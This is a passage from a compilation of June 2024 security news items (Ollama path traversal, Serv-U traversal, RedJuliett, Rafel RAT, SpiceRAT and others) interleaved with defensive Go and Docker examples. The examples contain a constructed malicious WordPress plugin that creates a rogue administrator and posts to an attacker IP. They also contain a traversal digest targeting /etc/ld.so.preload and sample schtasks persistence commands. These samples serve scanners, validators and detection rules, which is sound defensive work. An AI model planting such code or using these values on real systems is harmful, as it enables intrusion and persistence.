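	{"admin-user-creation (heuristic)", regexp.MustCompile(`(?s)wp_(?:insert|create)_user\b.{0,400}?administrator`)},
	{"footer-script-injection (heuristic)", regexp.MustCompile(`(?s)['"]wp_footer['"].{0,400}?<script`)},
}

// ScanSource returns every indicator that matches the given PHP source.
func ScanSource(file, src string) []Finding {
	var out []Finding
	for _, ind := range indicators {
		if ind.re.MatchString(src) {
			out = append(out, Finding{File: file, Indicator: ind.name})
		}
	}
	return out
}

// User is the subset of a WordPress user record needed for the account sweep
// (for instance from `wp user list --fields=user_login,roles,user_registered`).
type User struct {
	Login      string
	Role       string
	Registered string // YYYY-MM-DD, so lexical comparison is date order
}

// SuspiciousAdmins flags administrator accounts that carry the rogue usernames
// or were registered on/after 2024-06-21, the earliest date Wordfence reports.
// The date cut-off is a review heuristic: every hit still needs a human look.
func SuspiciousAdmins(users []User) []string {
	var out []string
	for _, u := range users {
		if u.Role != "administrator" {
			continue
		}
		known := u.Login == "Options" || u.Login == "PluginAuth"
		if known || u.Registered >= "2024-06-21" {
			out = append(out, u.Login)
		}
	}
	return out
}

// SamplePlugin is a constructed snippet modelled on the advisory's description;
// it is not code from any real plugin.
var SamplePlugin = `<?php
add_action('init', function () {
    $uid = wp_insert_user(array(
        'user_login' => 'PluginAuth',
        'user_pass'  => 'p@ss',
        'role'       => 'administrator',
    ));
    wp_remote_post('http://94.156.79.8/', array('body' => array('u' => 'PluginAuth')));
});
add_action('wp_footer', function () {
    echo '<script src="//example.invalid/seo.js"></script>';
});
`

// SampleUsers is constructed input for the account sweep.
var SampleUsers = []User{
	{"admin", "administrator", "2021-03-02"},
	{"Options", "administrator", "2024-06-22"},
	{"editor1", "editor", "2024-06-23"},
	{"tmpadmin", "administrator", "2024-06-24"},
}

func main() {
	for _, f := range ScanSource("social-warfare/sample.php", SamplePlugin) {
		fmt.Printf("%s: %s\n", f.File, f.Indicator)
	}
	fmt.Println("suspicious admins:", SuspiciousAdmins(SampleUsers))
}
```

Run it over `wp-content/plugins` by feeding each .php file to ScanSource; a hit on the IP or the usernames is a strong signal, while the two heuristics are only prompts for manual review, since legitimate plugins also create users and add footer scripts.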


Google Introduces Project Naptime for AI-Powered Vulnerability Research
25.6.24 
AI  The Hacker News
Google has developed a new framework called Project Naptime that it says enables a large language model (LLM) to carry out vulnerability research with an aim to improve automated discovery approaches.

"The Naptime architecture is centered around the interaction between an AI agent and a target codebase," Google Project Zero researchers Sergei Glazunov and Mark Brand said. "The agent is provided with a set of specialized tools designed to mimic the workflow of a human security researcher."

The initiative is so named for the fact that it allows humans to "take regular naps" while it assists with vulnerability research and automating variant analysis.

The approach, at its core, seeks to take advantage of advances in code comprehension and general reasoning ability of LLMs, thus allowing them to replicate human behavior when it comes to identifying and demonstrating security vulnerabilities.


It encompasses several components such as a Code Browser tool that enables the AI agent to navigate through the target codebase, a Python tool to run Python scripts in a sandboxed environment for fuzzing, a Debugger tool to observe program behavior with different inputs, and a Reporter tool to monitor the progress of a task.


Google said Naptime is also model-agnostic and backend-agnostic, and that it is better at flagging buffer overflow and advanced memory corruption flaws, according to CYBERSECEVAL 2 benchmarks. CYBERSECEVAL 2, released earlier this April by researchers from Meta, is an evaluation suite to quantify LLM security risks.

In tests carried out by the search giant to reproduce and exploit the flaws, the two vulnerability categories achieved new top scores of 1.00 and 0.76, up from 0.05 and 0.24, respectively, for OpenAI GPT-4 Turbo.

"Naptime enables an LLM to perform vulnerability research that closely mimics the iterative, hypothesis-driven approach of human security experts," the researchers said. "This architecture not only enhances the agent's ability to identify and analyze vulnerabilities but also ensures that the results are accurate and reproducible."


Critical RCE Vulnerability Discovered in Ollama AI Infrastructure Tool
25.6.24 
Vulnerability  The Hacker News
Cybersecurity researchers have detailed a now-patched security flaw affecting the Ollama open-source artificial intelligence (AI) infrastructure platform that could be exploited to achieve remote code execution.

Tracked as CVE-2024-37032, the vulnerability has been codenamed Probllama by cloud security firm Wiz. Following responsible disclosure on May 5, 2024, the issue was addressed in version 0.1.34 released on May 7, 2024.

Ollama is a service for packaging, deploying, running large language models (LLMs) locally on Windows, Linux, and macOS devices.

At its core, the issue relates to a case of insufficient input validation that results in a path traversal flaw an attacker could exploit to overwrite arbitrary files on the server and ultimately lead to remote code execution.


The shortcoming requires the threat actor to send specially crafted HTTP requests to the Ollama API server for successful exploitation.

It specifically takes advantage of the API endpoint "/api/pull" – which is used to download a model from the official registry or from a private repository – to provide a malicious model manifest file that contains a path traversal payload in the digest field.

This issue could be abused not only to corrupt arbitrary files on the system, but also to obtain remote code execution by overwriting the dynamic linker's ("ld.so") configuration file "/etc/ld.so.preload" so that it lists a rogue shared library, which is then loaded into every program executed afterwards.
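The root cause described above is a digest string that is trusted as a path component. The Go program below is an added illustration written for this page, not Ollama's own code: UnsafeBlobPath shows the vulnerable pattern (the manifest digest goes straight into the blob path, and filepath.Join's cleaning of ".." segments is exactly what lets it escape), while SafeBlobPath first rejects anything that is not a canonical sha256 digest and then confirms the result still lies under the blob store. The model store root, the "sha256-" file naming and the digests are assumptions for the example.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"regexp"
	"strings"
)

var (
	ErrBadDigest = errors.New("digest is not a canonical sha256 digest")
	ErrEscape    = errors.New("blob path escapes the model store")
)

// digestRe accepts only the form a well-behaved registry manifest carries.
var digestRe = regexp.MustCompile(`^sha256:[0-9a-f]{64}$`)

// UnsafeBlobPath is the vulnerable pattern: the attacker-controlled digest is
// dropped into the path unchecked. filepath.Join resolves "../" segments, so a
// traversal digest yields a path outside root.
func UnsafeBlobPath(root, digest string) string {
	return filepath.Join(root, "blobs", strings.ReplaceAll(digest, ":", "-"))
}

// SafeBlobPath validates the digest format, which alone rules out traversal,
// and then re-checks containment as defence in depth should the format rule
// ever be loosened.
func SafeBlobPath(root, digest string) (string, error) {
	if !digestRe.MatchString(digest) {
		return "", ErrBadDigest
	}
	store := filepath.Join(root, "blobs")
	p := filepath.Join(store, strings.ReplaceAll(digest, ":", "-"))
	rel, err := filepath.Rel(store, p)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrEscape
	}
	return p, nil
}

// SampleDigest is a constructed, syntactically valid digest.
var SampleDigest = "sha256:" + strings.Repeat("a", 64)

// TraversalDigest is the shape of value a malicious manifest would carry,
// aimed at the dynamic linker's preload file.
const TraversalDigest = "../../../../etc/ld.so.preload"

func main() {
	root := "/var/lib/ollama" // assumed store location for the example
	fmt.Println("unsafe:", UnsafeBlobPath(root, TraversalDigest))
	if _, err := SafeBlobPath(root, TraversalDigest); err != nil {
		fmt.Println("safe rejects traversal:", err)
	}
	p, _ := SafeBlobPath(root, SampleDigest)
	fmt.Println("safe accepts:", p)
}
```

The important design choice is that the allow-list on the digest format comes first: a deny-list for ".." would miss encodings and platform quirks, whereas a value that matches `^sha256:[0-9a-f]{64}$` cannot contain a separator at all.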

While the risk of remote code execution is reduced to a great extent in default Linux installations due to the fact that the API server binds to localhost, it's not the case with Docker deployments, where the API server is publicly exposed.

"This issue is extremely severe in Docker installations, as the server runs with `root` privileges and listens on `0.0.0.0` by default – which enables remote exploitation of this vulnerability," security researcher Sagi Tzadik said.

Compounding matters further is the inherent lack of authentication associated with Ollama, thereby allowing an attacker to exploit a publicly-accessible server to steal or tamper with AI models, and compromise self-hosted AI inference servers.

This makes it essential to put such services behind middleware, such as a reverse proxy that enforces authentication. Wiz said it identified over 1,000 exposed Ollama instances hosting numerous AI models without any protection.
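The exposure problem is a deployment setting rather than a code bug, so it is worth seeing the weak configuration beside a corrected one. The Docker Compose fragment below is an added example for this page, not from Wiz or the Ollama project; 11434 is Ollama's default API port, 0.1.34 is the first fixed release named above, and the nginx front-end with an htpasswd file is an assumed choice of authenticating proxy (its nginx.conf is not shown).

```yaml
# Weak: the API is published on every host interface and nothing in front of
# it asks for credentials, so anyone who can reach the host can pull, delete
# or overwrite models.
services:
  ollama:
    image: ollama/ollama:0.1.34   # first fixed release; use the current tag
    ports:
      - "11434:11434"             # binds 0.0.0.0:11434 on the host
---
# Corrected: the API is not published at all; only the authenticating proxy is
# reachable, and it forwards to http://ollama:11434 over the compose network.
# nginx.conf (assumed, not shown) sets auth_basic with /etc/nginx/.htpasswd.
services:
  ollama:
    image: ollama/ollama:0.1.34
    # no "ports:" entry: reachable only from other services on this network
  proxy:
    image: nginx:alpine
    ports:
      - "443:443"
    volumes:
      - ./nginx.conf:/etc/nginx/nginx.conf:ro
      - ./htpasswd:/etc/nginx/.htpasswd:ro
    depends_on:
      - ollama
```

Even with the patch applied, the corrected layout is what keeps an unauthenticated API from being a network-wide model store for anyone who finds it.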


"CVE-2024-37032 is an easy-to-exploit remote code execution that affects modern AI infrastructure," Tzadik said. "Despite the codebase being relatively new and written in modern programming languages, classic vulnerabilities such as path traversal remain an issue."

The development comes as AI security company Protect AI warned of over 60 security defects affecting various open-source AI/ML tools, including critical issues that could lead to information disclosure, access to restricted resources, privilege escalation, and complete system takeover.

The most severe of these vulnerabilities is CVE-2024-22476 (CVSS score 10.0), an SQL injection flaw in Intel Neural Compressor software that could allow attackers to download arbitrary files from the host system. It was addressed in version 2.5.0.


RedJuliett Cyber Espionage Campaign Hits 75 Taiwanese Organizations
25.6.24 
APT  The Hacker News

A likely China-linked state-sponsored threat actor has been linked to a cyber espionage campaign targeting government, academic, technology, and diplomatic organizations in Taiwan between November 2023 and April 2024.

Recorded Future's Insikt Group is tracking the activity under the name RedJuliett, describing it as a cluster that operates from Fuzhou, China, to support Beijing's intelligence collection goals related to the East Asian country. It's also tracked under the names Flax Typhoon and Ethereal Panda.

Other countries targeted by the adversarial collective include Djibouti, Hong Kong, Kenya, Laos, Malaysia, the Philippines, Rwanda, South Korea, and the U.S.

In all, as many as 24 victim organizations have been observed communicating with the threat actor infrastructure, including government agencies in Taiwan, Laos, Kenya, and Rwanda. It's also estimated to have targeted at least 75 Taiwanese entities for broader reconnaissance and follow-on exploitation.

"The group targets internet-facing appliances such as firewalls, load balancers, and enterprise virtual private network VPN products for initial access, as well as attempting structured query language SQL injection and directory traversal exploits against web and SQL applications," the company said in a new report published today.

As previously documented by CrowdStrike and Microsoft, RedJuliett is known to employ the open-source software SoftEther to tunnel malicious traffic out of victim networks and leverage living-off-the-land (LotL) techniques to fly under the radar. The group is believed to be active since at least mid-2021.

"Additionally, RedJuliett used SoftEther to administer operational infrastructure consisting of both threat actor-controlled servers leased from virtual private server VPS providers and compromised infrastructure belonging to three Taiwanese universities," Recorded Future noted.

A successful initial access is followed by the deployment of the China Chopper web shell to maintain persistence, alongside other open-source web shells like devilzShell, AntSword, and Godzilla. A few instances have also entailed the exploitation of a Linux privilege escalation vulnerability known as Dirty Cow (CVE-2016-5195).

"RedJuliett is likely interested in collecting intelligence on Taiwan's economic policy and trade and diplomatic relations with other countries," it said.

"RedJuliett, like many other Chinese threat actors, is likely targeting vulnerabilities in internet-facing devices because these devices have limited visibility and security solutions available, and targeting them has proven to be an effective way to scale initial access."

Update:
In a statement released by China's Ministry of Foreign Affairs, spokesperson Mao Ning dismissed the allegations, describing them as "fabricated disinformation on so-called Chinese hacking operations."


Multiple Threat Actors Deploying Open-Source Rafel RAT to Target Android Devices
25.6.24 
Virus  The Hacker News
Multiple threat actors, including cyber espionage groups, are employing an open-source Android remote administration tool called Rafel RAT to meet their operational objectives by masquerading it as Instagram, WhatsApp, and various e-commerce and antivirus apps.

"It provides malicious actors with a powerful toolkit for remote administration and control, enabling a range of malicious activities from data theft to device manipulation," Check Point said in an analysis published last week.

It boasts a wide range of features, such as the ability to wipe SD cards, delete call logs, siphon notifications, and even act as ransomware.

The use of Rafel RAT by DoNot Team (aka APT-C-35, Brainworm, and Origami Elephant) was previously highlighted by the Israeli cybersecurity company in cyber attacks that leveraged a design flaw in Foxit PDF Reader to trick users into downloading malicious payloads.

The campaign, which took place in April 2024, is said to have utilized military-themed PDF lures to deliver the malware.

Check Point said it identified around 120 different malicious campaigns, some targeting high-profile entities, that span various countries like Australia, China, Czechia, France, Germany, India, Indonesia, Italy, New Zealand, Pakistan, Romania, Russia, and the U.S.


"The majority of victims had Samsung phones, with Xiaomi, Vivo, and Huawei users comprising the second-largest group among the targeted victims," it noted, adding no less than 87.5% of the infected devices are running out-of-date Android versions that no longer receive security fixes.

Typical attack chains involve the use of social engineering to manipulate victims into granting the malware-laced apps intrusive permissions in order to hoover sensitive data like contact information, SMS messages (e.g., 2FA codes), location, call logs, and the list of installed applications, among others.

Rafel RAT primarily makes use of HTTP(S) for command-and-control (C2) communications, but it can also utilize Discord APIs to contact the threat actors. It also comes with an accompanying PHP-based C2 panel that registered users can leverage to issue commands to compromised devices.


The tool's effectiveness across various threat actors is corroborated by its deployment in a ransomware operation carried out by an attacker likely originating from Iran, who sent a ransom note written in Arabic through an SMS that urged a victim in Pakistan to contact them on Telegram.


"Rafel RAT is a potent example of the evolving landscape of Android malware, characterized by its open-source nature, extensive feature set, and widespread utilization across various illicit activities," Check Point said.

"The prevalence of Rafel RAT highlights the need for continual vigilance and proactive security measures to safeguard Android devices against malicious exploitation."


ExCobalt Cyber Gang Targets Russian Sectors with New GoRed Backdoor
23.6.24 
APT  The Hacker News
Russian organizations have been targeted by a cybercrime gang called ExCobalt using a previously unknown Golang-based backdoor known as GoRed.

"ExCobalt focuses on cyber espionage and includes several members active since at least 2016 and presumably once part of the notorious Cobalt Gang," Positive Technologies researchers Vladislav Lunin and Alexander Badayev said in a technical report published this week.

"Cobalt attacked financial institutions to steal funds. One of Cobalt's hallmarks was the use of the CobInt tool, something ExCobalt began to use in 2022."

Attacks mounted by the threat actor have singled out various sectors in Russia over the past year, including government, information technology, metallurgy, mining, software development, and telecommunications.

Initial access to environments is facilitated by taking advantage of a previously compromised contractor and a supply chain attack, wherein the adversary infected a component used to build the target company's legitimate software, suggesting a high degree of sophistication.


The modus operandi entails the use of various tools like Metasploit, Mimikatz, ProcDump, SMBExec, Spark RAT for executing commands on the infected hosts, and Linux privilege escalation exploits (CVE-2019-13272, CVE-2021-3156, CVE-2021-4034, and CVE-2022-2586).

GoRed, which has undergone numerous iterations since its inception, is a comprehensive backdoor that allows the operators to execute commands, obtain credentials, and harvest details of active processes, network interfaces, and file systems. It utilizes the Remote Procedure Call (RPC) protocol to communicate with its command-and-control (C2) server.

What's more, it supports a number of background commands to watch for files of interest and passwords as well as enable a reverse shell. The collected data is then exported to the attacker-controlled infrastructure.

"ExCobalt continues to demonstrate a high level of activity and determination in attacking Russian companies, constantly adding new tools to its arsenal and improving its techniques," the researchers said.

"In addition, ExCobalt demonstrates flexibility and versatility by supplementing its toolset with modified standard utilities, which help the group to easily bypass security controls and adapt to changes in protection methods."


Warning: New Adware Campaign Targets Meta Quest App Seekers
23.6.24 
Virus  The Hacker News

A new campaign is tricking users searching for the Meta Quest (formerly Oculus) application for Windows into downloading a new adware family called AdsExhaust.

"The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes,"  firm eSentire said in an analysis, adding it identified the activity earlier this month.

"These functionalities allow it to automatically click through advertisements or redirect the browser to specific URLs, generating revenue for the adware operators."

The initial infection chain involves surfacing the bogus website ("oculus-app[.]com") on Google search results pages using search engine optimization (SEO) poisoning techniques, prompting unsuspecting site visitors to download a ZIP archive ("oculus-app.EXE.zip") containing a Windows batch script.

The batch script is designed to fetch a second batch script from a command-and-control (C2) server, which, in turn, contains a command to retrieve another batch file. It also creates scheduled tasks on the machine to run the batch scripts at different times.

This step is followed by the download of the legitimate app onto the compromised host, while simultaneously additional Visual Basic Script (VBS) files and PowerShell scripts are dropped to gather IP and system information, capture screenshots, and exfiltrate the data to a remote server ("us11[.]org/in.php").

The response from the server is the PowerShell-based AdsExhaust adware that checks if Microsoft's Edge browser is running and determines the last time a user input occurred.

"If Edge is running and the system is idle and exceeds 9 minutes, the script can inject clicks, open new tabs, and navigate to URLs embedded in the script," eSentire said. "It then randomly scrolls up and down the opened page."

It's suspected that this behavior is intended to trigger elements such as ads on the web page, especially considering AdsExhaust performs random clicks within specific coordinates on the screen.

The adware is also capable of closing the opened browser if mouse movement or user interaction is detected, creating an overlay to conceal its activities to the victim, and searching for the word "Sponsored" in the currently opened Edge browser tab in order to click on the ad with the goal of inflating ad revenue.

Furthermore, it's equipped to fetch a list of keywords from a remote server and perform Google searches for those keywords by launching Edge browser sessions via the Start-Process PowerShell command.

"AdsExhaust is an adware threat that cleverly manipulates user interactions and hides its activities to generate unauthorized revenue," the Canadian company noted.

"It contains multiple techniques, such as retrieving malicious code from the C2 server, simulating keystrokes, capturing screenshots, and creating overlays to remain undetected while engaging in harmful activities."

The development comes as similar fake IT support websites surfaced via search results are being used to deliver Hijack Loader (aka IDAT Loader), which ultimately leads to a Vidar Stealer infection.

What makes the attack stand out is that the threat actors are also leveraging YouTube videos to advertise the phony site and using bots to post fraudulent comments, giving it a veneer of legitimacy to users looking for solutions to address a Windows update error (error code 0x80070643).

"This highlights the effectiveness of social engineering tactics and the need for users to be cautious about the authenticity of the solutions they find online," eSentire said.

The disclosure also comes on the heels of a malspam campaign targeting users in Italy with invoice-themed ZIP archive lures to deliver a Java-based remote access trojan named Adwind (aka AlienSpy, Frutas, jRAT, JSocket, Sockrat, and Unrecom).

"Upon extraction the user is served with .HTML files such as INVOICE.html or DOCUMENT.html that lead to malicious .jar files," Broadcom-owned Symantec said.

"The final dropped payload is Adwind remote access trojan (RAT) that allows the attackers control over the compromised endpoint as well as confidential data collection and exfiltration."


U.S. Treasury Sanctions 12 Kaspersky Executives Amid Software Ban
23.6.24 
BigBrothers  The Hacker News
The U.S. Department of the Treasury's Office of Foreign Assets Control (OFAC) imposed sanctions against a dozen individuals serving executive and senior leadership roles at Kaspersky Lab, a day after the Russian company was banned by the Commerce Department.

The move "underscores our commitment to ensure the integrity of our cyber domain and to protect our citizens against malicious cyber threats," Under Secretary of the Treasury for Terrorism and Financial Intelligence, Brian E. Nelson, said.

"The United States will take action where necessary to hold accountable those who would seek to facilitate or otherwise enable these activities."
The sanctions, however, do not extend to Kaspersky Lab, its parent or subsidiary companies, nor the company's founder and chief executive officer (CEO), Eugene Kaspersky, OFAC noted. The 12 C-suite and senior-level executives sanctioned are listed below -

Andrei Gennadyevich Tikhonov, Chief Operating Officer (COO) and board member
Daniil Sergeyevich Borshchev, Deputy CEO and board member
Andrei Anatolyevich Efremov, Chief Business Development Officer (CBDO) and board member
Igor Gennadyevich Chekunov, Chief Legal Officer (CLO) and board member
Andrey Petrovich Dukhvalov, Vice President and Director of Future Technologies
Andrei Anatolyevich Suvorov, Head of Kaspersky Operating System Business Unit
Denis Vladimirovich Zenkin, Head of Corporate Communications
Marina Mikhaylovna Alekseeva, Chief Human Resources (HR) Officer
Mikhail Yuryevich Gerber, Executive Vice President of Consumer Business
Anton Mikhaylovich Ivanov, Chief Technology Officer (CTO)
Kirill Aleksandrovich Astrakhan, Executive Vice President for Corporate Business
Anna Vladimirovna Kulashova, Managing Director for Russia and the Commonwealth of Independent States (CIS)
The development follows actions by the Commerce Department prohibiting Kaspersky from providing its software and other security services in America starting July 20, 2024, citing national security concerns. The company has also been placed on the Entity List.


Russia has said the sales ban on Kaspersky software was a typical move by the U.S. to stifle foreign competition with American products. Kaspersky has maintained that it has no links to the Russian government.


Chinese Hackers Deploy SpiceRAT and SugarGh0st in Global Espionage Campaign
23.6.24 
Virus  The Hacker News

A previously undocumented Chinese-speaking threat actor codenamed SneakyChef has been linked to an espionage campaign primarily targeting government entities across Asia and EMEA (Europe, Middle East, and Africa) with SugarGh0st malware since at least August 2023.

"SneakyChef uses lures that are scanned documents of government agencies, most of which are related to various countries' Ministries of Foreign Affairs or embassies," Cisco Talos researchers Chetan Raghuprasad and Ashley Shen said in an analysis published today.

Activities related to the hacking crew were first highlighted by the cybersecurity company in late November 2023 in connection with an attack campaign that singled out South Korea and Uzbekistan with a custom variant of Gh0st RAT called SugarGh0st.

A subsequent analysis from Proofpoint last month uncovered the use of SugarGh0st RAT against U.S. organizations involved in artificial intelligence efforts, including those in academia, private industry, and government services. It's tracking the cluster under the name UNK_SweetSpecter.


It's worth mentioning at this stage that SneakyChef refers to the same campaign that Palo Alto Networks Unit 42 has codenamed Operation Diplomatic Specter. The activity, per the security vendor, has been ongoing since at least late 2022, striking governmental entities in the Middle East, Africa, and Asia.

Talos said that it has since observed the same malware being used to likely focus on various government entities across Angola, India, Latvia, Saudi Arabia, and Turkmenistan based on the lure documents used in the spear-phishing campaigns, indicating a widening of the scope of the countries targeted.

In addition to leveraging attack chains that make use of Windows Shortcut (LNK) files embedded within RAR archives to deliver SugarGh0st, the new wave has been found to employ a self-extracting RAR archive (SFX) as an initial infection vector to launch a Visual Basic Script (VBS) that ultimately executes the malware by means of a loader while simultaneously displaying the decoy file.


The attacks against Angola are also notable for the fact that it utilizes a new remote access trojan codenamed SpiceRAT using lures from Neytralny Turkmenistan, a Russian-language newspaper in Turkmenistan.

SpiceRAT, for its part, employs two different infection chains for propagation, one of which uses an LNK file present inside a RAR archive that deploys the malware using DLL side-loading techniques.

"When the victim extracts the RAR file, it drops the LNK and a hidden folder on their machine," the researchers said. "After a victim opens the shortcut file, which masqueraded as a PDF document, it executes an embedded command to run the malicious launcher executable from the dropped hidden folder."

The launcher then proceeds to display the decoy document to the victim and run a legitimate binary ("dxcap.exe"), which subsequently sideloads a malicious DLL responsible for loading SpiceRAT.

The second variant entails the use of an HTML Application (HTA) that drops a Windows batch script and a Base64-encoded downloader binary, with the former launching the executable by means of a scheduled task every five minutes.


The batch script is also engineered to run another legitimate executable "ChromeDriver.exe" every 10 minutes, which then sideloads a rogue DLL that, in turn, loads SpiceRAT. Each of these components – ChromeDriver.exe, the DLL, and the RAT payload – are extracted from a ZIP archive retrieved by the downloader binary from a remote server.

SpiceRAT also takes advantage of the DLL side-loading technique to start a DLL loader, which captures the list of running processes to check if it's being debugged, followed by running the main module from memory.

"With the capability to download and run executable binaries and arbitrary commands, SpiceRAT significantly increases the attack surface on the victim's network, paving the way for further attacks," Talos said.


Military-themed Email Scam Spreads Malware to Infect Pakistani Users
23.6.24 
BigBrothers  The Hacker News
Cybersecurity researchers have shed light on a new phishing campaign that has been identified as targeting people in Pakistan using a custom backdoor.

Dubbed PHANTOM#SPIKE by Securonix, the unknown threat actors behind the activity have leveraged military-related phishing documents to activate the infection sequence.

"While there are many methods used today to deploy malware, the threat actors made use of ZIP files with a password-protected payload archive contained within," researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a report shared with The Hacker News.

The campaign is notable for its lack of sophistication and the use of simple payloads to achieve remote access to target machines.


The email messages come bearing a ZIP archive that purports to be meeting minutes related to the International Military-Technical Forum Army 2024, a legitimate event organized by the Ministry of Defense of the Russian Federation. It's set to be held in Moscow in mid-August 2024.

Present within the ZIP file is a Microsoft Compiled HTML Help (CHM) file and a hidden executable ("RuntimeIndexer.exe"), the former of which, when opened, displays the meeting minutes as well as a couple of images, but stealthily runs the bundled binary as soon as the user clicks anywhere on the document.

The executable is designed to function as a backdoor that establishes connections with a remote server over TCP in order to retrieve commands that are subsequently run on the compromised host.


In addition to passing along system information, it executes the commands via cmd.exe, gathers the output of the operation, and exfiltrates it back to the server. This includes running commands like systeminfo, tasklist, curl to extract the public IP address using ip-api[.]com, and schtasks to set up persistence.
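The behaviours in the two paragraphs above (a CHM viewer launching a hidden executable, then cmd.exe running systeminfo, tasklist, a curl request to ip-api[.]com and schtasks for persistence) map cleanly onto process-creation telemetry. The Go program below is an added detection example written for this page, not Securonix's rule set: it evaluates a few rules over process-creation events of the kind Sysmon Event ID 1 provides. The Event field names, the rules and the sample events (built to mirror the described chain) are my own constructions.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Event is the subset of a process-creation record the rules need. The field
// names are chosen for this example and are not a vendor schema.
type Event struct {
	PID, PPID   int
	Image       string // full path of the new process
	ParentImage string
	CommandLine string
}

// Alert names the process that tripped a rule and which rule it was.
type Alert struct {
	PID  int
	Rule string
}

var (
	// hh.exe (the CHM viewer) spawning an executable is rare in normal use.
	chmParent = regexp.MustCompile(`(?i)\\hh\.exe$`)
	// Reconnaissance and persistence commands the backdoor issues via cmd.exe.
	reconCmd = regexp.MustCompile(`(?i)\b(systeminfo|tasklist)\b`)
	ipLookup = regexp.MustCompile(`(?i)\bcurl\b.*ip-api\.com`)
	persist  = regexp.MustCompile(`(?i)\bschtasks(\.exe)?\b.*/create`)
)

// Evaluate applies the rules to every event and returns one alert per match.
// A single cmd.exe event gets at most one alert, from the most specific rule.
func Evaluate(events []Event) []Alert {
	var alerts []Alert
	for _, e := range events {
		if chmParent.MatchString(e.ParentImage) {
			alerts = append(alerts, Alert{e.PID, "executable launched from CHM viewer (hh.exe)"})
		}
		if strings.HasSuffix(strings.ToLower(e.Image), `\cmd.exe`) {
			switch {
			case ipLookup.MatchString(e.CommandLine):
				alerts = append(alerts, Alert{e.PID, "public IP lookup via ip-api.com"})
			case persist.MatchString(e.CommandLine):
				alerts = append(alerts, Alert{e.PID, "scheduled-task persistence via schtasks"})
			case reconCmd.MatchString(e.CommandLine):
				alerts = append(alerts, Alert{e.PID, "host reconnaissance command"})
			}
		}
	}
	return alerts
}

// SampleEvents is constructed telemetry mirroring the described chain plus one
// benign cmd.exe launch from Explorer; it is not a real capture.
var SampleEvents = []Event{
	{1200, 800, `C:\Users\u\AppData\Local\Temp\RuntimeIndexer.exe`, `C:\Windows\hh.exe`, `RuntimeIndexer.exe`},
	{1300, 1200, `C:\Windows\System32\cmd.exe`, `C:\Users\u\AppData\Local\Temp\RuntimeIndexer.exe`, `cmd.exe /c systeminfo`},
	{1301, 1200, `C:\Windows\System32\cmd.exe`, `C:\Users\u\AppData\Local\Temp\RuntimeIndexer.exe`, `cmd.exe /c curl http://ip-api.com/json`},
	{1302, 1200, `C:\Windows\System32\cmd.exe`, `C:\Users\u\AppData\Local\Temp\RuntimeIndexer.exe`, `cmd.exe /c schtasks /create /sc minute /mo 5 /tn Indexer /tr C:\Users\u\AppData\Local\Temp\RuntimeIndexer.exe`},
	{2000, 900, `C:\Windows\System32\cmd.exe`, `C:\Windows\explorer.exe`, `cmd.exe /c dir`},
}

func main() {
	for _, a := range Evaluate(SampleEvents) {
		fmt.Printf("pid %d: %s\n", a.PID, a.Rule)
	}
}
```

On its own each cmd.exe rule will fire on admins doing inventory work; the hh.exe-parent rule and correlation by parent PID (all three cmd.exe alerts share PPID 1200, the process spawned by hh.exe) are what turn the set into a credible detection for this chain.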

"This backdoor essentially functions as a command line-based remote access trojan (RAT) that provides the attacker with persistent, covert, and secure access to the infected system," the researchers said.

"The ability to execute commands remotely and relay the results back to the C2 server allows the attacker to control the infected system, steal sensitive information or execute additional malware payloads."


SolarWinds Serv-U Vulnerability Under Active Attack - Patch Immediately
23.6.24 
Vulnerability  The Hacker News
A recently patched high-severity flaw impacting SolarWinds Serv-U file transfer software is being actively exploited by malicious actors in the wild.

The vulnerability, tracked as CVE-2024-28995 (CVSS score: 8.6), concerns a directory traversal bug that could allow attackers to read sensitive files on the host machine.

Affecting all versions of the software prior to and including Serv-U 15.4.2 HF 1, it was addressed by the company in version Serv-U 15.4.2 HF 2 (15.4.2.157) released earlier this month.

The list of products susceptible to CVE-2024-28995 is below -

Serv-U FTP Server 15.4
Serv-U Gateway 15.4
Serv-U MFT Server 15.4, and
Serv-U File Server 15.4
Security researcher Hussein Daher of Web Immunify has been credited with discovering and reporting the flaw. Following the public disclosure, additional technical details and a proof-of-concept (PoC) exploit have since been made available.

Cybersecurity firm Rapid7 described the vulnerability as trivial to exploit, noting that it allows external unauthenticated attackers to read any file on disk, including binary files, provided they know the path to that file and it is not locked.

"High-severity information disclosure issues like CVE-2024-28995 can be used in smash-and-grab attacks where adversaries gain access to and attempt to quickly exfiltrate data from file transfer solutions with the goal of extorting victims," it said.

"File transfer products have been targeted by a wide range of adversaries the past several years, including ransomware groups."


Indeed, according to threat intelligence firm GreyNoise, threat actors have already begun to conduct opportunistic attacks weaponizing the flaw against its honeypot servers to access sensitive files like /etc/passwd, with attempts also recorded from China.
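Because the attempts GreyNoise describes arrive as ordinary HTTP requests, the quickest retrospective check is to scan web-server access logs for traversal sequences aimed at files like /etc/passwd. The Go program below is an added example written for this page, not code from SolarWinds, Rapid7 or GreyNoise, and it deliberately does not encode any Serv-U-specific request parameters: it parses Common Log Format lines, percent-decodes the request target repeatedly (so double encoding does not slip through), folds backslashes to forward slashes so Windows-style "\..\" is treated like "/../", and flags any path or parameter segment that is exactly "..". The log lines are constructed sample input.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// Hit describes one access-log line judged to carry a traversal attempt.
type Hit struct {
	Client  string
	Target  string // request target as logged
	Decoded string // fully decoded and normalised form
}

// logRe pulls client IP, method and request target out of Common Log Format.
var logRe = regexp.MustCompile(`^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"`)

// Normalise percent-decodes up to three times (bounded, to defeat double and
// triple encoding without looping forever) and then folds backslashes to
// forward slashes so "\..\" and "/../" compare alike.
func Normalise(target string) string {
	s := target
	for i := 0; i < 3; i++ {
		d, err := url.QueryUnescape(s)
		if err != nil || d == s {
			break
		}
		s = d
	}
	return strings.ReplaceAll(s, `\`, "/")
}

// IsTraversal reports whether any path or query segment is exactly "..".
// Splitting on '=' and '&' as well as '/' catches traversal hidden in
// parameter values, not only in the URL path.
func IsTraversal(target string) bool {
	segs := strings.FieldsFunc(Normalise(target), func(r rune) bool {
		return r == '/' || r == '?' || r == '&' || r == '='
	})
	for _, seg := range segs {
		if seg == ".." {
			return true
		}
	}
	return false
}

// ScanLog runs the check over access-log lines and returns the hits.
func ScanLog(lines []string) []Hit {
	var hits []Hit
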